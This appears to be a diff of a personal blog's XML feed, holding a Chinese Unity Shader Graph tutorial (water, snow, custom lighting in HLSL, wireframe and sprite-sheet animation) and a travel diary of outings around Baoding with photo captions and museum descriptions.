    ​ 给水面增加物体折射扭曲的效果,需要操作场景像素点的颜色 Scene Color,渲染器设置的 Opaque Texture 需要打开。

    png

    ​ 增加 Gradient Noise,Normal From Weight 将其转成法线贴图来调整 Scene Color,最后与之前渲染的颜色作一个 Lerp,输出到片元着色器的 Base Color。

    ​ RefractionStrength 可以调整折射的强度。

    png

    ​ 预览效果。

    png

    ​ 使用 Time 操作 Gradient Noise 的 Tiling And Offset 让折射效果随时间而变化。

    ​ RefractionSpeed 和 RefractionScale 分别控制折射效果的改变速度和扭曲大小。

    png

    ​ 最终 Shader Graph 如上图所示。

    06. 积雪

    png

    ​ 使用之前 pbr Sub Graph 创建一个基本的 Shader Graph 模板。

    png

    ​ 通过物体表面法线方向 Normal Vector 与世界空间的夹角来判断这个表面是否应该要有积雪。

    • SnowDirection 雪的方向,作一个 Normalize 归一化。
    • DotProduction,计算物体表面法线方向和雪的法线之间的夹角。
    • Remap,将 $[-1, 1]$ 的范围映射到 $[0, 1]$。
    • SnowDepth,控制雪的深度。
    • OneMinus,输出值 = 1 - 输出值,让 SnowDepth 符合值越大深度越深的效果。
    • Step,阈值处理。
    • 与之前的 Emission 做相加,最后的 Emission 即为所求。

    png

    ​ 预览效果。

    07. 自定义光照

    漫反射:

    ​ 兰伯特光照模型:$diffuse=I\cdot (L\cdot N)$

    • $I$ 是光照强度。
    • $L$ 为入射光线的反向量。
    • $N$ 为当前表面的法向量方向。

    png

    ​ 这么放置节点。

    png

    ​ MainLight 是一个自定义函数类,设置好它的 Outputs:

    • Color 漫反射颜色
    • Direction 漫反射方向
    # if SHADERGRAPH_PREVIEW
    Color = 1;
    Direction = -1;
    # else
    Light light = GetMainLight();
    Color = light.color;
    Direction = light.direction;
    # endif

    png

    ​ 漫反射预览效果。

    void MainLight_half(float3 WorldPos, out half3 Direction, out half3 Color, out half DistanceAtten, out half ShadowAtten)
    {
    #ifdef SHADERGRAPH_PREVIEW
    Direction = half3(0.5, 0.5, 0);
    Color = 1;
    DistanceAtten = 1;
    ShadowAtten = 1;
    #else

    #ifdef SHADOWS_SCREEN
    half4 clipPos = TransformWorldToClip(WorldPos);
    half4shadowCoord = ComputeScreenPos(clipPos);
    #else
    half4shadowCoord = TransformWorldToShadowCoord(WorldPos);
    #endif
    Light light = GetMainLight(shadowCoord);
    Direction = light.direction;
    Color = light.color;
    DistanceAtten = light.distanceAttenuation;
    ShadowAtten = light.shadowAttenuation;
    #endif
    }

    void DirectSpecular_half(half3 Specular, half Smoothness, half3 Direction, half3 Color, half3 WorldNormal, half3 WorldView, out half3 Out)

    {

    #ifdef SHADERGRAPH_PREVIEW

    Out = 0;

    #else

    Smoothness = exp2(10 * Smoothness + 1);

    WorldNormal = normalize(WorldNormal);

    WorldView = SafeNormalize(WorldView);

    Out = LightingSpecular(Color, Direction, WorldNormal, WorldView, half4(Specular, 0), Smoothness);

    #endif
    }

    这个 HLSL 文件中定义了两个函数,MainLight_halfDirectSpecular_half。这两个函数分别用于计算主光源的信息直接镜面反射的信息

    MainLight_half 函数接收一个世界坐标位置WorldPos)作为输入,输出主光源的方向Direction)、颜色Color)、距离衰减DistanceAtten)和阴影衰减ShadowAtten)。函数中首先判断是否在 ShaderGraph 预览模式下,如果是则直接赋值,否则根据是否使用屏幕空间阴影来计算阴影坐标shadowCoord),然后根据阴影坐标获取主光源信息

    DirectSpecular_half 函数接收镜面反射系数Specular)、光滑度Smoothness)、方向Direction)、颜色Color)、世界法线WorldNormal)和世界视线WorldView)作为输入,输出镜面反射的颜色Out)。函数中首先判断是否在 ShaderGraph 预览模式下,如果是则直接赋值,否则对输入参数进行处理(例如计算光滑度,规范化法线和视线等),然后调用 LightingSpecular 函数计算镜面反射的颜色。

    这两个函数主要用于在 Unity 的 Shader 中计算光照和反射,以实现更真实的渲染效果。

    png

    ​ 把上面这些代码放在一个 hlsl 文件中。

    png

    ​ MainLight_half 函数,精度为 Half,读取 Postion 作为世界坐标,输出:

    • 主光源的方向 Direction
    • 颜色 Color
    • 距离衰减 DistanceAtten
    • 阴影衰减 ShadowAtten

    镜面反射:光照强度是光源向量与顶点法线的反射向量的点积。

    png

    ​ DirectSpecular_half 函数,精度为 Half。

    输入:

    • 镜面反射系数 Specular
    • 光滑度 Smoothness
    • 方向 Direction
    • 颜色 Color
    • 世界法线 WorldNormal
    • 世界视线 WorldView

    输出:

    • 镜面反射的颜色 Out

    png

    • 镜面反射系数 Specular
    • 光滑度 Smoothness
    • 方向 Direction
    • 颜色 Color

    ​ 由物体给出;

    • 世界法线 WorldNormal
    • 世界视线 WorldView

    ​ 从游戏世界中获取。

    png

    ​ emmmm 乱七八糟的节点。

    png

    ​ 最终效果。

    08. 四方线框

    png

    ​ 教程里的四方线框对模型的 UV 贴图有要求,Blender 新建一个立方体模型,做细分,添加一个 UVMaps 并重置,导出至 Unity。

    png

    ​ 使用 Alpha Clip 隐去非边框的像素来实现四方线框的效果。

    png

    ​ 预览效果。

    png

    ​ 制作 U 另一方向。

    png

    ​ 预览效果。

    png

    ​ 同理,制作 V 方向的效果。

    png

    ​ 预览效果。

    png

    ​ 增加 Emission 颜色,颜色模式设为 HDR。

    png

    ​ 预览效果。

    png

    ​ 如果需要辉光效果,在 Camera 里打开 Post Processing。

    png

    ​ Volume 调整 Bloom 的 Tint 和 Intensity。

    png

    ​ 制作线框消失的效果,将顶点低于 Threshold 的隐去。

    png

    ​ 预览效果。

    png

    ​ 用 Time 代替 Threshold,由于 Time 是一个随时间不断增加的数,对其进行 Modulo 求余就可以实现周期一样的效果。

    09. Shader 帧动画

    png

    ​ 使用 Shader Graph 来实现用一张 UV 贴图的帧动画。

    png

    ​ 使用 Tiling And Offset 将 UV 贴图裁切。

    png

    ​ 一阵数学运算使得可以根据坐标来裁切 UV 贴图。

    png

    ​ 使用 Time 使得自动播放 UV 动画。

    png

    ​ 全家福。

    ]]>
    + 资源

    课程

    最简明的图形渲染流程解说——别被图形学吓到,入门

    图形渲染流程:

    几何阶段

    • 模型

      • 模型顶点 $XYZ$ 坐标

      • 模型矩阵 $M$

    • 世界(游戏场景)

      • 世界空间坐标
        • 模型空间到世界空间的转换过程:世界空间坐标 $= M\times$ 顶点坐标
    • 相机

      • 观察矩阵 $V$
      • 观察空间坐标
        • 世界空间到观察空间的转换过程:观察空间坐标 $= V\times M\times$ 顶点坐标
    • 投影

      • 投影矩阵 $P$
      • 投影坐标
        • 观察空间到投影的转换过程:投影坐标 $= P\times V\times M\times$ 顶点坐标

    ​ 由于矩阵乘法满足结合律,因此我们将引入的三个矩阵结合称为 $MVP$ 矩阵。($MVP$ 矩阵乘以坐标,就完成了坐标的完整变化,这个过程被称为几何阶段

    ​ 要对顶点坐标做额外的处理,称之为顶点着色器 Vertex Shader


    光栅化

    ​ 几何阶段结束后,还需要进行光栅化,才可以一个个像素点地显示。

    ​ 在光栅化阶段,计算机需要知道这些屏幕像素需要涂上什么样的颜色,是片元着色器 Fragment Shader需要完成的工作。


    通用着色器又叫顶点-片元着色器,因此两种着色器加起来才是完整的 Shader。

    01. 第一个光照 shader

    ​ URP / HDRP 支持 ShaderGraph。

    • Lit Shader Graph,光照模板,相当于以前的 PBR 节点。

    • Unlit Shader Graph,无光照模板

    png

    ​ 新建一个 Lit Shader Graph,打开之。

    png

    • 左边的面板可以控制最终显示在 Material 面板上的参数。

    • 中间的节点控制 Shader 逻辑。

    • 右边的 Graph Inspector 用于设置节点属性(Node Settings)和全局属性(Graph)。

    ​ 课程的示例 Shader Graph。

    • MainTex 是可设置的 Texture2D 类。
    • Sample Texture 2D 节点将 Texture 坐标转成 RGBA 颜色信息输出。
    • MainColor 是可设置的 Color 类。
    • Multiply 节点将两种颜色 A 和 B 相乘成一种颜色 Out 输出。
    • ColorTemp 和 ColorTint 都是可设置的 Float 数,在 Node Settings 以 Slider 形式,范围在 0 到 1 之间。
      • ColorTemp 色温越小越蓝,越大越黄。
      • ColorTint 色调越小越绿,越大越粉。
    • White Balance 节点用于白平衡处理。
    • 最后将输出的颜色应用在 Fragment 的 BaseColor 上。

    ​ 在 GameObject 上的效果:

    png

    01-1 光照补充与 SubGraph

    png

    ​ 新建一个 Shader Graph,绑定 Material,再绑定到模型上。

    jpg

    ​ 一阵操作 Shader Graph,使得 Shader Graph 可以支持:

    • MainTex 贴图
    • Normal 法线贴图
    • Matallic 金属度贴图
    • Smoothness 光滑度
    • Emission 自发光贴图
    • EmissionOn 控制自发光是否打开
    • EmissionColor 自发光颜色
    • AO 环境光屏蔽贴图

    ​ 选中这些节点,右键 Covert To Sub Graph。

    png

    ​ 这些节点就以一个 SubGraph 的形式展示。

    02. 轮廓光/边缘光

    png

    ​ 根据原模型提供的漫反射贴图 MainTex、法线贴图 NormalTex、金属度贴图 MetalTex、自发光贴图 EmissionTex 创建 Shader Graph 节点。

    png

    ​ 创建轮廓光效果:

    • Fresnel Effect 节点,创建轮廓光
    • RimPower,Float 属性,控制轮廓光强度,值越接近 0,轮廓光越发散
    • RimColor,Color 属性,控制轮廓光颜色
    • Multiply 节点,将 Fresnel Effect 节点输出的颜色值和 RimColor 相乘,获得带颜色的轮廓光
    • Add 节点,将轮廓光与轮廓光贴图相结合
      • 为什么要用 Add 而不是 Multiply?因为轮廓光贴图几乎全黑,使用 Multiply 会导致最后输出也几乎全黑

    png

    ​ 最终效果。

    03. 溶解

    png

    ​ 溶解效果需要在 Graph Inspector 里打开 Alpha Cliping。

    • Simple Noise 节点控制溶解形态,连接至 Alpha。

    • Noise Scale 控制溶解图案大小。

    • ClipRate 控制 Alpha Clip Threshold,Alpha 值低于 ClipRate 的点将不会被渲染。

    png

    ​ 添加溶解自发光边缘。

    • EdgeWidth 控制边缘宽度。
    • ClipRate 和 EdgeWitdh 经过 Add 节点叠加,输出值和 Simple Noise 的输出作为 Step 节点的输入,得到一张二值化图。
    • 二值化图和 EdgeColor 节点作为 Multiply 节点的输入,给溶解边缘染色,最后连上 Emission。

    png

    ​ 演示效果。

    png

    ​ 如果要利用模型自带的 Emission 贴图,还要再整个 Add 节点,最后再连 Emission 节点。

    png

    ​ 可以使用代码控制 ClipRate 的值来控制消融状态。

    ​ 如果要让物体自动消融,则可以使用 Time 节点连着 Remap 替换 ClipRate 来让物体自动消融。

    04. 水面(上)

    png

    • 水面是透明的,Surface Type 设成 Transparent。

    • 水面没有阴影,关闭 Cast Shadows。

    png

    ​ 检测与岸边的相交边缘,不透明的物体与半透明的物体之间的边缘检测,需要依靠屏幕深度来完成,打开它。

    png

    场景深度节点深度(Scene Depth,Sampling 为 Eye,包含透明像素)减去屏幕空间的 $W$ 向量(Screen Position,Mode 为 Raw,不包含透明像素)就是不透明物体与半透明物体相交的边缘。

    png

    ​ 预览结果。靠近水面边缘的地方呈现黑色,表明场景深度有效。

    png

    • 增加一个 Depth,控制深浅强度。

    • Strength 连 Multiply 调整修改力度。

    png

    • Clamp 将值钳制在 0 到 1 之间。
    • ShallowColor 和 Deep Color 控制水波颜色。

    png

    ​ 浏览效果,此时水已经被染色。

    png

    ​ Lerp 分理出 Alpha 通道,以显示水的透明效果。

    ​ 设定好 ShallowColor 和 Deep Color 的 Alpha 值才有效。

    png

    ​ 浏览效果,此时水呈现透明色。

    png

    ​ 给水增加法线贴图。

    ​ 共有两种法线:

    • FirstNormal
    • SecondNormal

    ​ SampleTexture2D 的 Type 记得选 Normal。两个法线贴图用 Add 节点相加。

    • Tiling And Offset 控制法线贴图的缩放和平移。
    • Normal Strength 调整法线强度,最后连片元着色器的 Normal。

    png

    ​ 浏览效果。可以正确渲染法线了。

    png

    ​ 将 NormalStrength 与 边缘信息再进行 Lerp 运算,使得法线贴图考虑边缘信息。

    png

    ​ 给法线贴图的 Tiling And Offset 用 Time 控制,以达到水波流动的动态效果。

    png

    ​ 在 Scene 里打开 Always Refresh,便可浏览到水流实时流动的效果。

    png

    ​ 接下来修改顶点着色器,只需要修改模型的 Y 坐标即可。

    ​ 用 Gradient Noise 给模型的 Y 坐标做一个扰动,后面用 Time、Multiply、Tiling And Offset 控制扰动属性。

    png

    ​ 浏览效果,此时物体发生了形变。

    png

    ​ 增加 Displacement 控制扰动强度。

    png

    ​ 预览结果。通过修改 Displacement 的值以修改扰动强度。

    05. 水面(下)

    png

    ​ 为了给水面增加波光粼粼的效果,使用一个 Float 类型,范围 $[0, 1]$ 的 Smoothness 来控制片元着色器的 Smoothness。

    png

    ​ 给水面增加物体折射扭曲的效果,需要操作场景像素点的颜色 Scene Color,渲染器设置的 Opaque Texture 需要打开。

    png

    ​ 增加 Gradient Noise,Normal From Weight 将其转成法线贴图来调整 Scene Color,最后与之前渲染的颜色作一个 Lerp,输出到片元着色器的 Base Color。

    ​ RefractionStrength 可以调整折射的强度。

    png

    ​ 预览效果。

    png

    ​ 使用 Time 操作 Gradient Noise 的 Tiling And Offset 让折射效果随时间而变化。

    ​ RefractionSpeed 和 RefractionScale 分别控制折射效果的改变速度和扭曲大小。

    png

    ​ 最终 Shader Graph 如上图所示。

    06. 积雪

    png

    ​ 使用之前 pbr Sub Graph 创建一个基本的 Shader Graph 模板。

    png

    ​ 通过物体表面法线方向 Normal Vector 与世界空间的夹角来判断这个表面是否应该要有积雪。

    • SnowDirection 雪的方向,作一个 Normalize 归一化。
    • DotProduction,计算物体表面法线方向和雪的法线之间的夹角。
    • Remap,将 $[-1, 1]$ 的范围映射到 $[0, 1]$。
    • SnowDepth,控制雪的深度。
    • OneMinus,输出值 = 1 - 输出值,让 SnowDepth 符合值越大深度越深的效果。
    • Step,阈值处理。
    • 与之前的 Emission 做相加,最后的 Emission 即为所求。

    png

    ​ 预览效果。

    07. 自定义光照

    漫反射:

    ​ 兰伯特光照模型:$diffuse=I\cdot (L\cdot N)$

    • $I$ 是光照强度。
    • $L$ 为入射光线的反向量。
    • $N$ 为当前表面的法向量方向。

    png

    ​ 这么放置节点。

    png

    ​ MainLight 是一个自定义函数类,设置好它的 Outputs:

    • Color 漫反射颜色
    • Direction 漫反射方向
    1
    2
    3
    4
    5
    6
    7
    8
    # if SHADERGRAPH_PREVIEW
    Color = 1;
    Direction = -1;
    # else
    Light light = GetMainLight();
    Color = light.color;
    Direction = light.direction;
    # endif

    png

    ​ 漫反射预览效果。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    void MainLight_half(float3 WorldPos, out half3 Direction, out half3 Color, out half DistanceAtten, out half ShadowAtten)
    {
    #ifdef SHADERGRAPH_PREVIEW
    Direction = half3(0.5, 0.5, 0);
    Color = 1;
    DistanceAtten = 1;
    ShadowAtten = 1;
    #else

    #ifdef SHADOWS_SCREEN
    half4 clipPos = TransformWorldToClip(WorldPos);
    half4shadowCoord = ComputeScreenPos(clipPos);
    #else
    half4shadowCoord = TransformWorldToShadowCoord(WorldPos);
    #endif
    Light light = GetMainLight(shadowCoord);
    Direction = light.direction;
    Color = light.color;
    DistanceAtten = light.distanceAttenuation;
    ShadowAtten = light.shadowAttenuation;
    #endif
    }

    void DirectSpecular_half(half3 Specular, half Smoothness, half3 Direction, half3 Color, half3 WorldNormal, half3 WorldView, out half3 Out)

    {

    #ifdef SHADERGRAPH_PREVIEW

    Out = 0;

    #else

    Smoothness = exp2(10 * Smoothness + 1);

    WorldNormal = normalize(WorldNormal);

    WorldView = SafeNormalize(WorldView);

    Out = LightingSpecular(Color, Direction, WorldNormal, WorldView, half4(Specular, 0), Smoothness);

    #endif
    }

    这个 HLSL 文件中定义了两个函数,MainLight_halfDirectSpecular_half。这两个函数分别用于计算主光源的信息直接镜面反射的信息

    MainLight_half 函数接收一个世界坐标位置WorldPos)作为输入,输出主光源的方向Direction)、颜色Color)、距离衰减DistanceAtten)和阴影衰减ShadowAtten)。函数中首先判断是否在 ShaderGraph 预览模式下,如果是则直接赋值,否则根据是否使用屏幕空间阴影来计算阴影坐标shadowCoord),然后根据阴影坐标获取主光源信息

    DirectSpecular_half 函数接收镜面反射系数Specular)、光滑度Smoothness)、方向Direction)、颜色Color)、世界法线WorldNormal)和世界视线WorldView)作为输入,输出镜面反射的颜色Out)。函数中首先判断是否在 ShaderGraph 预览模式下,如果是则直接赋值,否则对输入参数进行处理(例如计算光滑度,规范化法线和视线等),然后调用 LightingSpecular 函数计算镜面反射的颜色。

    这两个函数主要用于在 Unity 的 Shader 中计算光照和反射,以实现更真实的渲染效果。

    png

    ​ 把上面这些代码放在一个 hlsl 文件中。

    png

    ​ MainLight_half 函数,精度为 Half,读取 Postion 作为世界坐标,输出:

    • 主光源的方向 Direction
    • 颜色 Color
    • 距离衰减 DistanceAtten
    • 阴影衰减 ShadowAtten

    镜面反射:光照强度是光源向量与顶点法线的反射向量的点积。

    png

    ​ DirectSpecular_half 函数,精度为 Half。

    输入:

    • 镜面反射系数 Specular
    • 光滑度 Smoothness
    • 方向 Direction
    • 颜色 Color
    • 世界法线 WorldNormal
    • 世界视线 WorldView

    输出:

    • 镜面反射的颜色 Out

    png

    • 镜面反射系数 Specular
    • 光滑度 Smoothness
    • 方向 Direction
    • 颜色 Color

    ​ 由物体给出;

    • 世界法线 WorldNormal
    • 世界视线 WorldView

    ​ 从游戏世界中获取。

    png

    ​ emmmm 乱七八糟的节点。

    png

    ​ 最终效果。

    08. 四方线框

    png

    ​ 教程里的四方线框对模型的 UV 贴图有要求,Blender 新建一个立方体模型,做细分,添加一个 UVMaps 并重置,导出至 Unity。

    png

    ​ 使用 Alpha Clip 隐去非边框的像素来实现四方线框的效果。

    png

    ​ 预览效果。

    png

    ​ 制作 U 另一方向。

    png

    ​ 预览效果。

    png

    ​ 同理,制作 V 方向的效果。

    png

    ​ 预览效果。

    png

    ​ 增加 Emission 颜色,颜色模式设为 HDR。

    png

    ​ 预览效果。

    png

    ​ 如果需要辉光效果,在 Camera 里打开 Post Processing。

    png

    ​ Volume 调整 Bloom 的 Tint 和 Intensity。

    png

    ​ 制作线框消失的效果,将顶点低于 Threshold 的隐去。

    png

    ​ 预览效果。

    png

    ​ 用 Time 代替 Threshold,由于 Time 是一个随时间不断增加的数,对其进行 Modulo 求余就可以实现周期一样的效果。

    09. Shader 帧动画

    png

    ​ 使用 Shader Graph 来实现用一张 UV 贴图的帧动画。

    png

    ​ 使用 Tiling And Offset 将 UV 贴图裁切。

    png

    ​ 一阵数学运算使得可以根据坐标来裁切 UV 贴图。

    png

    ​ 使用 Time 使得自动播放 UV 动画。

    png

    ​ 全家福。

    ]]>
    @@ -4499,7 +4499,7 @@ /posts/Diary-3-%E5%87%BA%E6%B8%B8/ - 前言

    jpg

    梧桐与银杏

    ​ 按照去年所观察的现象,大概过两周银杏就开始大幅度变黄,真是太棒了!

    ​ 科研喜闻乐见地遇见了瓶颈,有点开摆了……


    ​ 保定气候播报:

    # y 轴数据(假设为温度和 PM 值)
    y1 = [11, 12, 8, 12, 10, 10, 9, 8, 7, 9, 11, 6, 6, 8] # 当日最低温
    y2 = [25, 26, 25, 21, 22, 24, 23, 24, 23, 24, 23, 23, 25, 24] # 当日最高温
    y3 = [59, 74, 49, 24, 64, 54, 83, 39, 29, 77, 143, 165, 67, 53] # 当日 PM 值

    png

    ​ 别看某些天最低气温特别低,室内依然热腾腾,还是得穿短袖。

    正文

    10.2

    png

    雄安

    10.5

    11:01 鸭子

    jpg

    嘎嘎嘎

    ​ 图书馆门口悠闲的鸭子。

    20:19 和美保定

    jpg

    和和与美美

    ​保定文旅吉祥物“和和”“美美”,是在“和美保定”品牌基础上设计衍生出的保定文旅专属形象,内涵寓意丰富、设计灵动鲜活,展现了保定独具魅力的文化旅游新形象。

    ​ 大晚上又跑去东湖公园散步。在暑假的这两个月里,保定政府似乎努力开发了许多保定的旅游资源。

    20:20 关汉卿大剧院

    jpg

    金灿灿

    ​ 关汉卿大剧院金碧辉煌。

    20:31 未来石、关汉卿大剧院、农行大楼

    jpg

    三大件

    ​ 保定三大法宝。

    20:44 某口号

    jpg

    团结 有爱 包容 文明

    ​ 平面图绘制的从左到右依次是军校广场、总督署广场、关汉卿大剧院、古莲花池。

    10.6

    ​ 法定假期的最后一天,凡哥又想要出去玩。我极力推荐满城汉墓,但是凡哥认为这就是个烂怂墓没啥好去的,于是改去了新修的保定宴博物馆。

    ​ 但是似乎有点远啊,10 km 坐公交要将近两个小时凡哥不能接受,打车要 50 块钱我不能接受,最后决定骑共享单车好了。

    11:43 数据湾

    jpg

    数据湾

    ​ 途径保定的高新区,可以看到小米京东之类的,但是在网上似乎没看到什么工作机会。

    ​ 上网查了下保定的高新区从 1992 年就开始规划,至今也 30 多年了。

    12:27 盖盖盖

    jpg

    盖盖盖

    ​ 高新区还在加盖的写字楼。

    ​ 骑车也不知道骑了多久,反正我是蛮累的。

    12:33 保定宴大楼

    jpg

    大门口

    ​ 终于到了!

    12:46 仿古建筑

    jpg

    仿古建筑

    ​ 刚进门还修得蛮漂亮的的,但是里面人挤人……

    ​ 除了刚进门的一些仿古建筑外,没有让我感受到“保定宴”的氛围,依旧是走的网红小吃路线,没看到什么保定特色美食。为什么要在这里卖长沙大香肠呢?而且还卖得死贵。

    12:53 孙中山?

    jpg

    总统府?

    ​ 不知道保定在民国时期有什么故事?感觉没啥故事硬蹭……

    12:53 电影海报

    jpg

    电影海报

    ​ 80-90 年代的电影海报?

    12:55 民国招牌

    jpg

    民国风

    ​ 依旧是民国风情的招牌。

    12:56 假木牌

    jpg

    假木牌

    ​ 于是乎逛了一圈,实在觉得无趣,配不上它所宣传的效果,果然保定这个地方就是个美食荒漠……最后还是在对面的汇博解决的午饭……花了 30 元吃了份羊肉泡馍。

    ​ 由于阳哥把自己的自行车骑过来了,只好再硬着头皮陪阳哥骑回学校……

    14:53 狼牙山五壮士纪念碑

    jpg

    双拥广场

    ​狼牙山五壮士(1941),八路军晋察冀军区第 1 军分区 1 团 7 连 6 班,为在河北省保定市易县狼牙山战斗中英勇抗击日军和伪满洲国军的八路军 5 位英雄,他们是马宝玉、葛振林、宋学义、胡德林、胡福才,他们用生命和鲜血谱写出一首气吞山河的壮丽诗篇。

    10.13

    07:05 日出

    jpg

    太阳东升

    ​ 雾霾一大好处——看日出的时候不会刺眼。

    10:50 中国古动物博物馆

    jpg

    能见度极低的中国古动物博物馆

    ​ 国庆 8 天长假后就是 7 天连上班,天天泡电脑前人确实有点吃不消了……于是决定偷跑出去吸雾霾了。打算骑去淮军公所,再不去免费开放的时间就过去了!

    ​ 途径中国古动物博物馆,一个国家级的博物馆一直迟迟不开放……

    11:07 京门虎踞

    jpg

    京门虎踞

    ​ 听说保定人很恨北京人,但是他们还是得把靠近北京当作自己的招牌。

    11:21 淮军公所

    jpg

    中国古戏楼博物馆

    ​古戏楼,是中国古代戏曲的表演场所,是中国古代剧场的组成部分。中国剧场历史悠久,形式多样,数量庞大,分布广泛。从先秦时期的摆地为场到汉唐时期的亭台楼阁,从宋元时期的专门性剧场瓦舍勾栏,再到清代的神庙、宗祠、宫廷、茶园戏楼,不断细分的演出场地形态在物换星移中记录着中国传统戏曲的兴盛,也见证着戏台上的人间百态。中华戏曲源远流长,从原始祭祀舞蹈到标志戏曲形成的南戏,繁荣的北杂剧、明清传奇,再到剧种繁多的地方戏,共同聚合成百花齐放的中华戏曲大观园。建于光绪年间的保定淮军昭忠祠暨公所戏楼是古代建筑艺术与戏曲表演艺术的有机结合,是清代会馆戏楼的典范。
    ​本陈列由古代戏楼、公所戏楼、中国戏曲三个部分组成,勾勒出中国古戏楼的发展变迁,历史内涵,以及雅俗共赏、博大精深的中国戏曲的历史风姿和丰富内涵。

    ​ 一阵骑终于来到了淮军公所的招牌——中国古戏楼博物馆!

    11:24 敕建李文忠公祠

    jpg

    李文忠和昭忠祠有什么关系?(后注:李鸿章谥号)

    ​淮军公所地处保定古城区西南隅的淮军公所全称“淮军昭忠祠暨公所”,是李鸿章任直隶总督兼北洋大臣后,于光绪十四年至光绪十七年(1888 年—1891 年)经专折奏准,奉诏修建的“淮军昭忠祠”及“公所”(淮军办公驻地)合一的建筑群,占地约 30 亩。此祠是继苏州、无锡、武汉之后为祭奠在战斗中阵亡的淮军将士修建的第四座“昭忠祠”,也是规模最宏大的一座。淮军公所位于保定市环城西路 220 号,是李鸿章为纪念淮军在镇压太平天国和捻军阵亡的“将士”而建的昭忠祠,并兼有安徽会馆之功能。李鸿章死后改为李鸿章祠堂。

    ​ 怪不得是个徽式建筑,但是我感觉还是像北方建筑的风格。

    11:37 望荷亭

    jpg

    望荷亭

    ​ 崭新的望荷亭。

    11:37 荷花

    jpg

    ​ 快到了晚秋,居然还有一种荷花没有完全凋谢。

    11:40 园林

    jpg

    小湖

    ​ 淮军公所的后花园。

    11:44 碑文

    jpg

    石碑

    ​ 如果是真的话,保存得还蛮完好。

    11:45 巷口

    jpg

    小巷

    ​ 感觉有点当年去恭王府的感觉。

    11:48 展览

    png

    保定戏曲

    ​ 博物馆里展示的大都是仿制的物品,不过设计得还是蛮用心的。

    ​保定是国家历史文化名城,是一个孕育、繁衍了多个地方剧种的戏剧之乡。目前近 20 个剧种被列入国家级、省级、市级非物质文化遗产名录,是祖国戏曲长河中特色鲜明的璀璨明珠。
    ​保定戏曲源远流长。金代,建于定兴东林寺的戏楼,元代,以关汉卿为代表的保定籍元杂剧作家群;明代,众多的戏曲乐户,晚清和民国时期,戏曲大融合、大调整及京剧、评剧、豫剧等大剧种的传唱;抗战时期,晋察冀根据地的“大众戏剧”运动;新中国成立后,戏曲的全面改革发展,共同勾勒出保定戏曲的发展轨迹。
    ​保定地方戏曲异彩纷呈。高阳河西村是北方昆曲的诞生地,定兴的祥泰班是河北梆子早期科班之一,在全国具有一定影响的地方剧种保定老调亦生于斯、长于斯;彪炳史册、光耀星空的戏曲名家数不胜数;厚植于民间的自娱自乐戏曲团体更是数以千计,丰厚的戏曲资源彰显着保定的文化底蕴。
    ​本展从保定戏曲的源流,保定老调的魅力,保定地方剧种、唱腔、艺术家等多个维度铺展出“无处不弦歌”的保定戏曲画卷。

    ​ 至于保定戏曲,应该跟京剧大差不差吧。

    11:51 戏楼

    jpg

    戏楼

    ​ 被翻新得蛮气派的戏楼。

    11:56 雕塑

    jpg

    雕塑

    ​ 被翻新得蛮气派的雕塑。

    12:37 保定古玩市场

    ​ 出来了,看着时间还早,打算再去光园转转。结果告诉我还在维修……那就再去曹锟戏楼打个卡好了。

    jpg

    ​ 保定古玩市场,可以进去回收古玩、粮票、钱币之类的。

    12:41 曹锟戏楼

    jpg

    ​关岳行宫俗称“老爷庙”,“曹锟大戏台”,为国内唯一一座同时供奉关羽和岳飞的庙宇。早在元太宗十三年(公元 1241 年)始建的关岳行宫,初时称“武安王庙”。经明、清两代的重修,到民国初年由坐镇保定的大总统曹锟作为直系大本营,将关岳行宫修建的愈增规模。行宫里曹锟亲自撰书的“佛光普照”碑,此碑高约 1.74 公尺 , 宽约 0.75 公尺矗立。这宏伟庑殿,宽敞的戏楼经过多年的尘封,仍然保留,成为国内著名的历史遗迹之一。

    ]]>
    + 前言

    jpg

    梧桐与银杏

    ​ 按照去年所观察的现象,大概过两周银杏就开始大幅度变黄,真是太棒了!

    ​ 科研喜闻乐见地遇见了瓶颈,有点开摆了……


    ​ 保定气候播报:

    1
    2
    3
    4
    # y 轴数据(假设为温度和 PM 值)
    y1 = [11, 12, 8, 12, 10, 10, 9, 8, 7, 9, 11, 6, 6, 8] # 当日最低温
    y2 = [25, 26, 25, 21, 22, 24, 23, 24, 23, 24, 23, 23, 25, 24] # 当日最高温
    y3 = [59, 74, 49, 24, 64, 54, 83, 39, 29, 77, 143, 165, 67, 53] # 当日 PM 值

    png

    ​ 别看某些天最低气温特别低,室内依然热腾腾,还是得穿短袖。

    正文

    10.2

    png

    雄安

    10.5

    11:01 鸭子

    jpg

    嘎嘎嘎

    ​ 图书馆门口悠闲的鸭子。

    20:19 和美保定

    jpg

    和和与美美

    ​保定文旅吉祥物“和和”“美美”,是在“和美保定”品牌基础上设计衍生出的保定文旅专属形象,内涵寓意丰富、设计灵动鲜活,展现了保定独具魅力的文化旅游新形象。

    ​ 大晚上又跑去东湖公园散步。在暑假的这两个月里,保定政府似乎努力开发了许多保定的旅游资源。

    20:20 关汉卿大剧院

    jpg

    金灿灿

    ​ 关汉卿大剧院金碧辉煌。

    20:31 未来石、关汉卿大剧院、农行大楼

    jpg

    三大件

    ​ 保定三大法宝。

    20:44 某口号

    jpg

    团结 有爱 包容 文明

    ​ 平面图绘制的从左到右依次是军校广场、总督署广场、关汉卿大剧院、古莲花池。

    10.6

    ​ 法定假期的最后一天,凡哥又想要出去玩。我极力推荐满城汉墓,但是凡哥认为这就是个烂怂墓没啥好去的,于是改去了新修的保定宴博物馆。

    ​ 但是似乎有点远啊,10 km 坐公交要将近两个小时凡哥不能接受,打车要 50 块钱我不能接受,最后决定骑共享单车好了。

    11:43 数据湾

    jpg

    数据湾

    ​ 途径保定的高新区,可以看到小米京东之类的,但是在网上似乎没看到什么工作机会。

    ​ 上网查了下保定的高新区从 1992 年就开始规划,至今也 30 多年了。

    12:27 盖盖盖

    jpg

    盖盖盖

    ​ 高新区还在加盖的写字楼。

    ​ 骑车也不知道骑了多久,反正我是蛮累的。

    12:33 保定宴大楼

    jpg

    大门口

    ​ 终于到了!

    12:46 仿古建筑

    jpg

    仿古建筑

    ​ 刚进门还修得蛮漂亮的的,但是里面人挤人……

    ​ 除了刚进门的一些仿古建筑外,没有让我感受到“保定宴”的氛围,依旧是走的网红小吃路线,没看到什么保定特色美食。为什么要在这里卖长沙大香肠呢?而且还卖得死贵。

    12:53 孙中山?

    jpg

    总统府?

